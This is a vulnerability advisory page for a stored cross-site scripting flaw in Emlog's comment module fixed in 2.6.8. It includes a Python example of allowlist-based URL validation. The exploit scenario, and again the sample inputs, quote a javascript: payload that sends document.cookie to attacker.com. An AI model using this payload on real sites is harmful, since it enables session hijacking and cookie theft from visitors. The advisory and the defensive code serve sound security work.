Severity by source
CVSS vector (GitHub Advisory, the only source for this CVE): CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Description (GitHub Advisory)
Emlog is an open-source website building system. Prior to version 2.6.8, there is a stored cross-site scripting (XSS) vulnerability in the Emlog comment module via a URI scheme validation bypass. This issue has been patched in version 2.6.8.
Analysis (AI-generated)
Stored cross-site scripting (XSS) in Emlog's comment module allows unauthenticated remote attackers to inject malicious scripts via URI scheme validation bypass, affecting all versions prior to 2.6.8. The vulnerability requires user interaction (clicking a malicious link) and can result in session hijacking, credential theft, or malware distribution to website visitors. …
Vulnerability Assessment (AI-generated)
| Risk Assessment | This vulnerability presents moderate real-world risk. … |
| Exploit Scenario | An attacker crafts a comment containing a malicious URI payload such as 'javascript:fetch("https://attacker.com/steal?cookie="+document.cookie)' and submits it to an Emlog blog. The comment passes validation (due to the URI scheme bypass) and is stored in the database. … |
| Remediation | Vendor-released patch: upgrade Emlog to version 2.6.8 or later immediately. … |
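The scenario above hinges on a user-supplied comment URL being accepted with a `javascript:` scheme and later emitted into a link. The following is an added example (not Emlog's code; Emlog is written in PHP, Python is used here for illustration) of the defensive pattern that closes this class of bug: normalize the URL the way a browser will parse it, allow only `http` and `https` with a non-empty host, and when the URL is rejected render the comment text without any link at all rather than trying to sanitize the value. The page does not describe the exact validation flaw in Emlog before 2.6.8, so the function names, the allowlist and the sample inputs here are constructed.

```python
"""Allowlist-based URI scheme check for user-supplied comment links.

Added example, not Emlog's code. It demonstrates the general control against
stored XSS via a javascript: URI in a comment link; the specific flaw fixed in
Emlog 2.6.8 is not described on the page this accompanies.
"""
import html
from urllib.parse import urlsplit

# Only navigable web schemes are allowed; everything else (javascript:, data:,
# vbscript:, file:, ...) is rejected by default rather than denylisted.
ALLOWED_SCHEMES = {"http", "https"}

# C0 control characters and space: browsers strip these from both ends of a URL
# before reading the scheme, so the validator must do the same.
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def normalize_url(raw: str) -> str:
    """Apply the WHATWG URL pre-processing steps so the check sees the same
    string the browser will parse: trim leading/trailing controls and spaces,
    and drop ASCII tab/newline characters anywhere in the string."""
    stripped = raw.strip(_C0_AND_SPACE)
    return stripped.replace("\t", "").replace("\n", "").replace("\r", "")


def is_safe_comment_url(raw: str) -> bool:
    """True only for an absolute http(s) URL with a host component."""
    url = normalize_url(raw)
    if not url:
        return False
    parts = urlsplit(url)          # urlsplit lowercases the scheme for us
    if not parts.scheme:
        return False               # scheme-relative or bare text: reject
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)


def render_comment_link(raw_url: str, text: str) -> str:
    """Render the commenter's display name as a link only when the URL passes
    the allowlist; otherwise emit the escaped text with no href at all.
    Output is HTML-escaped so the value cannot break out of the attribute."""
    safe_text = html.escape(text, quote=True)
    if not is_safe_comment_url(raw_url):
        return safe_text
    safe_href = html.escape(normalize_url(raw_url), quote=True)
    return f'<a href="{safe_href}" rel="nofollow noopener">{safe_text}</a>'


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate URL and the payload shape quoted
    # in the exploit scenario above.
    for candidate in (
        "https://example.com/profile",
        'javascript:fetch("https://attacker.com/steal?cookie="+document.cookie)',
    ):
        print(repr(candidate), "->", is_safe_comment_url(candidate))
```

Rejecting the link entirely, instead of stripping the offending scheme and keeping the rest, avoids a second round of parsing ambiguity: the stored value is either a well-formed `http(s)` URL or it is never rendered as a link.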